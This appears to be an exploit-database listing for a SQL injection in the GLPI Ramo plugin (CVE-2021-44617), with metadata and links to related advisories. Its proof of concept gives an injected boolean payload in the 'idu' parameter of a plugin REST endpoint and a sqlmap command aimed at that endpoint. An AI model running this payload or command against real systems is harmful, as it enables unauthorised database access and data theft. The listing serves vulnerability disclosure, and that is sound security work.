Lucene search
Joas Antonio1337DAY-ID-37481HistoryMar 14, 2022 - 12:00 a.m.
Baixar GLPI Project 9.4.6 - SQL injection Vulnerability
2022-03-1400:00:00
Joas Antonio
0day.today
280
sql injection
glpi
vulnerability
exploit
vendor
software
version
tested
cve
poc1
ramo
api
sqlmap
windows
linux
EPSS
0.002
Percentile
56.5%
# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi
# Exploit Author: Joas Antonio
# Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/
# Software Link: https://glpi-project.org/pt-br/baixar/
# Version: GLPI - 9.4.6
# Tested on: Windows/Linux
# CVE : CVE-2021-44617
#POC1:
plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111
sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"
Related
nvd
nvd
CVE-2021-44617
2022-03-28 02:15:06
cve
cve
CVE-2021-44617
2022-03-28 02:15:06
prion
prion
Sql injection
2022-03-28 02:15:00
exploitdb
exploitdb
Baixar GLPI Project 9.4.6 - SQLi
2022-03-14 00:00:00
packetstorm
packetstorm
Baixar GLPI Project 9.4.6 SQL Injection
2022-03-14 00:00:00
osv
osv
CVE-2021-44617
2022-03-28 02:15:06
cvelist
cvelist
CVE-2021-44617
2022-03-28 01:08:13